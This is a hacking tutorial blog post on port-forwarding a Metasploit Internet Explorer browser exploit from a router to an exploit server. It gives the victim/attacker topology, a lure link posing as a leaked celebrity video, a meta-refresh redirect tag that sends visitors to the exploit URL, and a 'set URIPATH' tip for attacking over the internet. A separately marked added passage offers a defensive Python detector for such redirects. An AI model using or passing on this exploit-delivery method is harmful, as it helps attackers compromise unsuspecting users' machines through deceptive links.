Type : Tips and Trick
Level : Easy – Medium
UPDATE : This tip only works on a Local Area Network with 2 different network addresses, not on a WAN. Sorry about that… but if you still want to read on, you can continue.
I believe this tips and trick, "How to Port Forward Browser Exploit From Router to Your Exploit Server", will be useful for those of you who are still confused about port redirection. By the way, you can view my previous tutorial about port redirection on Windows on this page: http://www.hacking-tutorial.com/hacking-tutorial/spi-port-forward-redirection-for-windows-to-another-port-ip-address/.
On that post there's a comment from Nikos asking how to forward from a router to your exploit server. I believe that when he asked this he was perhaps a little confused by the URIPATH (something like http://192.168.1.2/URIPATH), because with the SPI port forward from my previous post you can't forward a web address; you can only forward an IP address followed by a port number (e.g. 192.168.1.5:8080), without any URIPATH.
Let’s start it…
1. Apache Web Server (already bundled with Backtrack)
Here’s the topology for this case :
Victim (Windows XP SP3) IP address : 192.168.8.93
Attacker Router (Windows 7 SP1) IP address : 192.168.8.89
Exploit Server / Attacker (Backtrack 5 R2) IP address : 192.168.8.91
1. Okay, here's the scene : the exploit server (we can call it the attacker) sends a malicious link to the victim via e-mail, messenger, etc. The attacker has a router with a public IP address, and his computer uses a local IP address (192.168.8.91).
2. The picture below shows what the attacker does on his router to forward every incoming packet on port 80 to his computer's local IP address on port 80.
3. The exploit I use for this tips and trick comes from this hacking tutorial (http://www.hacking-tutorial.com/hacking-tutorial/exploiting-ms11_003-internet-explorer-vulnerability-using-metasploit-framework/), but I changed the SRVPORT option to its default, port 8080. As you can see in the picture below, I've already started the exploit server to listen for every incoming connection.
4. In this condition, if the victim tries to access 192.168.8.89 he will see nothing, or even an error page. That's because the attacker's router forwards packets arriving on port 80 to 192.168.8.91 port 80, but port 80 on the exploit server isn't active, so we need to activate it.
You can activate the Apache web server by running this command in your terminal :
5. But the command in step 4 will result in the following page in the victim's web browser :
Hey, where's the exploit?? It's a default Apache page…
6. Because our exploit server runs on 192.168.8.91:8080/avril-video-leaked.avi, not on port 80, we need to redirect it to the proper location. Here are the steps :
Open your terminal (CTRL + ALT + T) and type :
to edit the default index.html page; and then add the following code :
<meta http-equiv="refresh" content="0;url=http://192.168.8.91:8080/avril-video-leaked.avi" />
to redirect the default index.html page to our exploit server (see picture below).
Press CTRL + O to save and press CTRL + X to quit.
7. Now every page request to the attacker's default Apache server will be redirected to the exploit server.
8. Why not give a try on your own machine?
Hope it’s useful 🙂
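Seen from the defending side, the redirect in step 6 is easy to spot in proxy or sandbox captures: a landing page whose zero-delay meta refresh points to a different host or port than the one it was served from. The following check is an added example, not part of the original tutorial; the function names, the `max_delay` threshold and the sample page are constructed for illustration.

```python
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit

DEFAULT_PORTS = {"http": 80, "https": 443}
# Constructed sample: the forwarded address and the tag from step 6.
PAGE_URL = "http://192.168.8.89/"
REDIRECT_HTML = ('<html><head><meta http-equiv="refresh" content="0;url='
                 'http://192.168.8.91:8080/avril-video-leaked.avi" /></head></html>')


def origin(url):
    """Return (scheme, host, port) with the default port filled in."""
    parts = urlsplit(url)
    return parts.scheme, parts.hostname, parts.port or DEFAULT_PORTS.get(parts.scheme)


class MetaRefreshFinder(HTMLParser):
    """Collect (delay_seconds, target) for each <meta http-equiv="refresh">."""

    def __init__(self):
        super().__init__()
        self.refreshes = []

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}
        if tag != "meta" or a.get("http-equiv", "").lower() != "refresh":
            return
        delay, _, rest = a.get("content", "").partition(";")
        key, _, target = rest.strip().partition("=")
        if key.strip().lower() != "url" or not target.strip():
            return  # plain timed reload of the same page, no redirect target
        try:
            seconds = float(delay.strip() or 0)
        except ValueError:
            return
        self.refreshes.append((seconds, target.strip().strip("'\"")))


def suspicious_refreshes(page_url, html, max_delay=1.0):
    """Absolute targets of near-instant refreshes that leave the page's origin."""
    finder = MetaRefreshFinder()
    finder.feed(html)
    hits = []
    for seconds, target in finder.refreshes:
        absolute = urljoin(page_url, target)
        if seconds <= max_delay and origin(absolute) != origin(page_url):
            hits.append(absolute)
    return hits
```

Same-origin refreshes and plain timed reloads are not reported, so the check can run over ordinary browsing traffic and only surface instant cross-origin or cross-port hops.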
1. Will this method redirect it correctly to my exploit server?
Answer : Yes of course if you set it correctly
2. At the top of this post you gave an update that this method only works for a network with 2 network addresses… what if I want to do it from WAN / INTERNET?
Answer : Make sure that when you set up URIPATH you give it an empty string, like this
set URIPATH ""
so your router (see step 2) can forward directly every incoming packet to your exploit server.